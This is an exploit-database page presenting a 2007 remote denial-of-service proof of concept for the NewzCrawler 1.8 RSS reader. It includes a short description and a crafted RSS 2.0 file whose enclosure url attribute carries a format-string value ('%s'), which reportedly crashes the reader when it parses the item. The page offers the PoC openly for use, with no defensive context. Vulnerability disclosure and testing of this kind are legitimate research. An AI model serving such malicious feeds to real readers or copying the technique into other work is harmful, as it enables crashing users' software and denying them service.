[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit

Author
gbr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6388
Category
dos / poc
Date add
14-05-2007
Platform
unsorted
=================================================================
NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit
=================================================================




?NewzCrawler 1.8 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2

NewzCrawler 1.8 becomes usntable and begin crash when parsering the 'url' atribute of
'enclosure' sub-element contends some invalid string* at time of show a new item of a 
RSS 2.0 file.

* '%s', '%Y', '%%', 'n,', and others.

PoC:

<?xml version="1.0"?>
<rss version="2.0">

<channel>
        <title>Test</title>
        <link></link>
        <description></description>

        <item>
                <title>Remote DoS PoC</title>
                <enclosure url="%s"/>
        </item>
</channel>
</rss>



#  0day.today [2024-12-25]  #